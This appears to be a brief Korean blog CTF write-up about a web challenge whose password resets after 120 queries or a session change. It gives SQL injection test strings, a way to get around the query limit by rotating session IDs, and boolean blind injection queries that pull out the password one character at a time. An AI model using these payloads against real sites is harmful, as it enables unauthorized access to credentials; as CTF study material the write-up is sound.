hint
120 Count -> 새로운 암호생성
세션 변경시 -> 새로운 암호생성
1'or 1='1
1'or 1='2
세션 gvqmir6dlg2rl9se35j6n73uh1 부터 gvqmir6dlg2rl9se35j6n73uh5 까지 생성 후
돌려가며 쿼리를 날리면 120번이라는 카운트는 무의미하게 된다.
select * from rms_120_pw where (ip='x.x.x.x') and (password='1 or substr(password,1,1)='g') False
select * from rms_120_pw where (ip='x.x.x.x') and (password='1 or substr(password,1,1)='h') True
'D:\ > CTF' 카테고리의 다른 글
| [CodeGate 2014] web 200 (1) | 2014.02.24 |
|---|---|
| CODEGATE2013 - web200 (0) | 2013.10.06 |
| CODEGATE2013 - web100 (0) | 2013.10.06 |
| 2013 화이트햇 콘테스트 stalking2 (100 points) (0) | 2013.09.18 |
| 2013 화이트햇 콘테스트 stalking (100 points) (0) | 2013.09.09 |
